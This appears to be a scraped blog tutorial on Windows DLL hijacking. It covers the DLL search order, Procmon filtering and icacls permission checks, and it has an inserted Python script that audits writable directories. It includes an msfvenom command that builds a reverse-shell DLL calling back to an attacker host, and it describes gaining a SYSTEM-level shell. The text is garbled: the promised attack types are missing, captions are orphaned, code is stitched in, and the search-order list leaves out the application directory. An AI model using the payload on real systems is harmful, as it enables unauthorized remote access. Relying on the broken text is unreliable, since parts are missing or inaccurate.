So what is a DLL?

To understand DLL hijacking, we first need to understand what a DLL is.

DLL Hijacking

DLL hijacking is an attack that abuses the way the Windows DLL search and load algorithm locates libraries, allowing an attacker to inject code into an application by manipulating files on disk: writing a malicious DLL in the right place causes a vulnerable application to load it. The technique has been used since Windows 2000 and still works today. The search covers the following locations:

  • C:\Windows\System32
  • C:\Windows\System
  • C:\Windows
  • The current working directory
  • Directories in the system PATH environment variable
  • Directories in the user PATH environment variable

Types of DLL Hijacking attacks

DLL hijacking attacks are broadly classified into three types, as follows:

Configure the filter in Procmon so that it shows only the processes with missing DLLs.
As we can see, Procmon has filtered the application processes that failed to locate a DLL.
Command: icacls c:\PS
  • (CI) — container inherit;
  • (IO) — inherit only;
  • (NP) — don’t propagate inherit;
  • (I) — permission inherited from the parent container.
  • F — full access;
  • N — no access;
  • M — modify access;
  • RX — read and eXecute access;
  • R — read-only access;
  • W — write-only access.
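As an added example (not code from the original post), a small Python audit that parses the output of the icacls check above for each directory on the search order and flags the ones a standard user can write to, since that is what a planted DLL relies on. The icacls output is constructed, not captured from a real host, and the set of low-privilege principals is an assumption.

```python
import re
from typing import Dict, List
# Principals every standard (non-admin) Windows user belongs to (assumed list).
LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
INHERIT = {"OI", "CI", "IO", "NP", "I"}  # inheritance codes from the icacls legend
WRITE_RIGHTS = {"F", "M", "W"}            # simple rights that let a user write files
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)$")

def parse_icacls(path: str, output: str) -> List[dict]:
    """Turn the text printed by `icacls <path>` into ACE dicts {who, flags, rights}."""
    aces = []
    for lineno, raw in enumerate(output.splitlines()):
        line = raw.strip()
        if lineno == 0 and line.startswith(path):  # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:  # blank line or the "Successfully processed" summary
            continue
        parts = re.findall(r"\(([^)]*)\)", m.group("flags"))
        flags = {p for p in parts if p in INHERIT or p == "DENY"}
        rights = {r for p in parts if p not in flags for r in p.split(",")}
        aces.append({"who": m.group("who"), "flags": flags, "rights": rights})
    return aces

def low_priv_can_write(aces: List[dict]) -> bool:
    """True if a standard user may create or replace files in the directory itself.
    (IO) entries apply only to children and are skipped; DENY entries are not subtracted."""
    for ace in aces:
        if ace["who"] in LOW_PRIV and "DENY" not in ace["flags"] \
                and "IO" not in ace["flags"] and ace["rights"] & WRITE_RIGHTS:
            return True
    return False

def audit(icacls_outputs: Dict[str, str]) -> List[str]:
    """Return the directories whose icacls output shows standard-user write access."""
    return [p for p, out in icacls_outputs.items()
            if low_priv_can_write(parse_icacls(p, out))]

# Constructed sample output (not captured from a real host): System32 is
# read-only for Users, while the application directory C:\PS grants Modify.
SAMPLE = {
    r"C:\Windows\System32": "C:\\Windows\\System32 BUILTIN\\Administrators:(RX)\n"
                            "                    BUILTIN\\Users:(RX)\n",
    r"C:\PS": "C:\\PS BUILTIN\\Administrators:(I)(OI)(CI)(F)\n"
              "      NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(M)\n"
              "      NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)\n"
              "      BUILTIN\\Users:(I)(OI)(CI)(RX)\n\n"
              "Successfully processed 1 files; Failed processing 0 files\n",
}
```

Feed it the real output of `icacls <dir>` for every directory in the search order above (including each PATH entry) and `audit` lists the ones to fix.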
Command: msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<listening port> -f dll -o <dll name>
The target application is running as SYSTEM
The generated malicious DLL
The connection is established and can be used to perform malicious activity

How to safeguard the end system from DLL hijacking

Protection against DLL hijacking needs to start with the software developers. If developers use absolute paths to specify the expected location of dynamic link libraries in the program code, the vulnerability can be greatly reduced.